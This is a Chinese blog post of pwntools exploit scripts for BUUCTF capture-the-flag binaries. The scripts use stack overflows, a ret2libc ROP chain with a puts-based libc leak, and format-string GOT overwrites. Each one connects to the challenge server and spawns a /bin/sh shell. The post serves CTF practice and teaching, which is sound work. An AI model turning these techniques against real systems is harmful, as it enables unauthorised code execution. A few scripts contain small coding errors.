Buuctf之pwn

最新推荐文章于 2024-02-06 18:08:40 发布
最新推荐文章于 2024-02-06 18:08:40 发布
阅读量663 收藏 2
点赞数 1
分类专栏: CTF 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53809201/article/details/124623997
版权

1.pwn1

from pwn import *
log_level = 'debug'
elf = ELF("./pwn1")
local = 0
if local:
   r = process("./pwn1")
else:
   r = remote("node4.buuoj.cn",29317)
bin_sh = 0x000000000040118A
system_addr = 0x0000000000401191

payload = b'a'*0x0F + p64(system_addr) + p64(bin_sh)

r.sendline(payload)

r.interactive()

2.warmup_csaw_2016

from pwn import *
context(os='linux',arch= 'amd64',log_level='debug')
elf = ELF("./warmup")
local = 0
if local:
    r = process("./warmup")
else:
    r = remote("node4.buuoj.cn",29230)

addr = 0x000000000040060e
payload = b'a'*72 + p64(addr)

r.sendline(payload)

r.interactive()

3.cisn_2019_n_1

from pwn import *
context(os='linux',arch='amd64',log_level='debug')
elf=ELF("./ciscn")
local = 0
if local:
    r = process("./ciscn")
else:
    r = remote("node4.buuoj.cn",28539)
v2=0x41348000 //11.28125的十六进制形式
payload = b'a'*(0x30-0x04)+p64(v2)
r.sendline(payload)
r.interactive()

4.pwn1_sctf_201 6

from pwn import *
log_level = 'debug'
elf = ELF("./pwn1_sctf")
local = 0
if local:
    r = process("./pwn1_sctf")
else:
    r = remote("node4.buuoj.cn",28883)

get_flag = 0x08048F0D

payload = b'I'*20 + b'a'*4 + p32(get_flag)
r.sendline(payload)

r.interactive()

5.level0

from pwn import *
context(os = 'linux',arch = 'amd64',log_level = 'debug')
elf = ELF("./level0")
local = 0
if local:
    r = process("./level0")
else:
    r = remote("node4.buuoj.cn",26837)

call_system = 0x0000000000400596

payload = b'a'*0x80+p64(0)+p64(call_system)

r.sendline(payload)

r.interactive()

6.ciscn_2019_c_1

from pwn import *
context(os= 'linux',arch='amd64',log_level='debug')
elf=ELF("./ciscn_2019")
local = 0

if local:
    r = process("./ciscn_2019")
else:
    r = remote("node4.buuoj.cn",29853)


def encrypt(paylaod):
    l = list(payload)
    for i in range(len(l)):
        if l[i].isdigit():
            l[i] = chr(ord(l[i])^0xF)
        if l[i].isupper():
            l[i] = chr(ord(l[i])^0xE)
        if l[i].islower():
            l[i] = chr(ord(l[i])^0xD)
   
    return ''.join(l)
    
         
pop_rdi = 0x0000000000400c83
pop_ret = 0x00000000004006b9
main_addr = 0x0000000000400B28
put_plt = elf.plt['puts']
put_got = elf.got['puts']

r.recv()
r.sendline("1")

r.recvuntil("encrypted")
payload = b'1'*(0x50+8) + p64(pop_rdi) + p64(put_got) + p64(put_plt) + p64(main_addr)

payload = encrypt(payload)
r.sendline(payload)

r.recvuntil("Ciphertext\n")
r.recvuntil("\n")

puts_addr = u64(r.recvline()[:-1].ljust(8,'\x00'))

log.success('puts_addr='+hex(puts_addr))

puts_offset = 0x0809c0

libc_base = puts_addr - puts_offset

log.success('libc_base'+hex(libc_base))
r.sendlineafter("choice!","1")

system_offset = 0x04f440
bin_sh_offset = 0x1b3e9a

sys_addr = libc_base + system_offset
bin_sh = libc_base + bin_sh_offset

payload1 = b'a'*(0x50+0x8) + p64(pop_ret) + p64(pop_rdi) + p64(bin_sh) + p64(sys_addr)

r.sendline(payload1)

r.interactive()

7.第五空间2019决赛pwn5

  • 思路

    • 思路1:直接利用格式化字符串改写unk_804C044之中的数据.第一个read利用格式化字符串漏洞修改unk_804C044的值,第二个read输入我们修改后的值去满足if判断从而执行system(‘/bin/sh’).

    • 思路2:利用格式化字符串改写atoi的got地址,改为system_plt的地址.第一个read利用格式化字符串漏洞修改atoi_got为system_plt,第二个read输入"/bin/sh\x00",执行system(“/bin/sh”).

    • 思路3:unk_804C044是随机生成的,我们可以自己写入一个值,然后在第二个read时再发送这个值.

    • exp1

from pwn import * 
    context(os = 'linux',arch = 'i386',log_level = 'debug')
    elf = ELF("./pwn")
    local = 0
    if local:
        r = process("./pwn")
    else:
        r = remote("node4.buuoj.cn",27278)
    unk_addr =  0x0804C044 
    payload = p32(unk_addr)+b"%10$n"
    r.sendline(payload)
    r.sendline(str(0x04))#unk_addr = 4byte 
    r.interactive()
  • exp2
  from pwn import *
    context(os = 'linux',arch = 'i386',log_level = 'debug')
    elf = ELF("./pwn")
    local = 0
    if local:
        r = process("./pwn")
    else:
        r = remote("node4.buuoj.cn",27278)
    # 0x804c000  0x804d000 rw-p  # unk_804C044  0x0804C044
    system_plt = 0x08049080
    atoi_got = 0x0804C034
    #payload = b'%10$n' + p32(atoi_got)+p32(system_plt)
    payload = fmtstr_payload(10,{atoi_got:system_plt})
    r.sendline(payload)
    r.sendline("/bin/sh\x00")
    r.interactive()

[fmtstr_payload用法](https://breeze-666.github.io/2022/01/14/noname/)

exp3

   from pwn import * 
    context(os = 'linux',arch = 'i386',log_level = 'debug')
    elf = ELF("./pwn")
    local = 0
    if local:
        r = process("./pwn")
    else:
        r = remote("node4.buuoj.cn",27278)
    unk_addr =  0x0804C044 
    payload = fmtstr_payload(10,{unk_addr:0x1})
    r.sendline(payload)
    r.sendline(str(0x1))
    r.interactive()
微凉_z
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTFpwn题解(一些栈题+程序分析)
swedsn
01-13 1万+
文章目录前言一、test_your_nc二、rip2.读入数据总结 前言 萌新的总结(包含当时做题的全过程),方便以后查看。有什么不对的望各位大佬指点。 一、test_your_nc 1.直接nc(nc+的ip+端口号)。这里是直接进入了对方的shell命令中(有些题目是直接进入对方的文件并不会进入对方的shell中)。接下来就是和操作自己的shell一样的,ls查看目录,cat查看文件flag。 相互连接 二、rip 1使用IDA打开文件,先找main函数,然后按F5查看伪代码。看wp说fun可疑,点进
BUUCTF-PWN
weixin_52125240的博客
12-04 1737
BUUCTF-PWN1.test_your_nc2.rip3.warmup_csaw_20164.ciscn_2019_n_15.pwn1_sctf_2016 1.test_your_nc 根据名字的提示,来测试一下我们的nc cat flag 得到我们的flag nc的使用 nc的全名是netcat,其主要用途是建立和监听任意TCP和UDP连接,支持ipv4和ipv6。因此,它可以用来网络调试、端口扫描等等 常用语法: nc [-hlnruz][-g<网关...>][-G<指向器数目&
BUUCTF pwn
L0g1c的博客
01-30 1601
第一道: 第一步:连接nc靶场 第二步:连接靶场后,执行 ls 命令,展示该靶场下目录文件。 第三步:里有个 flag文件 使用 cat命令进行查看。 得到flag
BUUCTF PWN方向 1-6题 详解wp
qq_62564422的博客
02-06 1409
构造payload:变量声明后顺序入栈,每个标识表示变量所占栈空间底部,s为输入的变量,则其需要覆盖的长度为0X3C~0X00(0X3C字节),0X00处表示返回地址值(4字节)需要覆盖;返回地址的数据(8字节)(被垃圾数 据覆盖后则改为访问之后地址)+(返回地址 地址数+1)(远程端使用了ubuntu18,ubuntu18以上版本调用64位程序中的system函数需要栈对齐,在执行system时有一个指令需要栈对齐 ,所以地址+1)而且这个空间是连续的,v1之后就是v2,他们的内存块是接在一起的。
buuctfpwn
个人笔记
04-04 2668
一日一PWN/REpwn1_sctf_2016 实践是检验真理的唯一标准。 pwn1_sctf_2016 1.找到漏洞的利用点往往才是困难点。(直接F5看看反汇编) 发现两个可以函数跟进去看看 2.这里对反汇编出来的Vuln理解了半天(本还想从汇编直接分析,不过进展收获不大,欢迎有兴趣的朋友一起交流),下面还是从伪代码分析。 通过这几行能看出最后A变成了B。即把YOU 换成了I。 因为上面是S的溢出点是3C,可fgets之读取了32并不会超过3C,但函数会把一个32个I换成32个YOU就达到了溢出点。 3.
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
buuctf pwn ubuntu20的自己搭建运行环境
11-15
pwn ubuntu20的自己搭建运行环境具体情参考https://blog.csdn.net/weixin_41748164/article/details/127874334
2024NKCTF-pwn
最新发布
03-25
2024NKCTF_pwn
welpwn pwn 入门题
02-11
pwn 入门题
PWN.rar_PWN
09-24
在IT领域,PWN(Payload Writing Notation)通常与安全竞赛和漏洞利用有关,尤其是在网络安全和逆向工程中。然而,这里的"pwn"似乎指的是一个特定的功能或项目,而不是通常的安全概念。从标题和描述来看,我们正在...
持续更新 BUUCTF——PWN(一)
weixin_41748164的博客
08-13 1048
buuctf pwn
buuctf习题pwn(2~10)
yw__y的博客
03-30 959
持续更新 BUUCTF——PWN(三)
weixin_41748164的博客
03-04 865
这只是个人笔记,buuctf的刷题的第三篇,欢迎一起讨论重新搭建一个合适pwn环境:https://blog.csdn.net/weixin_41748164/article/details/127874334buuctf的前两页:https://blog.csdn.net/weixin_41748164/article/details/126325515。
BUUCTF PWN-RIP详解
weixin_43780092的博客
09-07 4945
BUU CTF PWN 入门知识详解
-/bin/sh: 命令:not found的解决办法
ee230的专栏
05-03 4605
https://blog.csdn.net/u011124985/article/details/80774171 https://blog.csdn.net/kunkliu/article/details/79816397 https://blog.csdn.net/nanhangfengshuai/article/details/50499246
BUUCTF PWN-堆题总结 2021-09-27
m0_56897090的博客
09-27 2001
文章目录整体分析-2021-09-27新角度TcacheUAFFile结构体HourseOfForceUnlink经验新角度ciscn_2019_final_5分析EXPTCACHEhitcon_2018_children_tcache分析EXPUAFwustctf2020_easyfast分析EXPACTF_2019_babyheap分析EXPgyctf_2020_some_thing_interesting分析EXPbjdctf_2020_YDSneedGrirlfrien分析EXPciscn_2019
Pwn部署框架,出题(ubuntu)
Trick的博客
11-03 2844
Pwn部署框架(ubuntu)Docker 安装1.国内daocloud一键安装命令:2.切换镜像源Docker 简单使用ctf_xinetdBuild Docker 安装 1.国内daocloud一键安装命令: curl -sSL https://get.daocloud.io/docker | SH- SSL的https ://get.daocloud.io/docker | SH 备用apt安装: apt-get install docker docker-compose 2.切换镜像源 vim /e
buuctf pwn解题
2301_80477504的博客
02-01 457
1.
pwn学习-攻防世界(二)
qq_45653588的博客
01-18 425
文章目录0X00 pwn-1000x01 monkey0x02 stack20x03 pwn-2000x04 welpwn 0X00 pwn-100 下载文件,只开启了NX保护。 反编译一下,main函数调用了sub_40068E()函数,然后sub_40068E()函数调用了sub_40063D函数,第一个参数为v1,第二个参数为200. int sub_40068E() { char v1; // [rsp+0h] [rbp-40h] sub_40063D((__int64)&v1,
BUUCTF pwn rip
01-28
根据提供的引用内容,BUUCTF PWN-RIP是一个关于PWN技术的详解文章。文章中提到了64位的EIF文件中rbp寄存器的大小为8个字节。如果对这部分不太理解,可以阅读作者的另一篇关于PWN基础知识的文章。 BUUCTF PWN-RIP...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值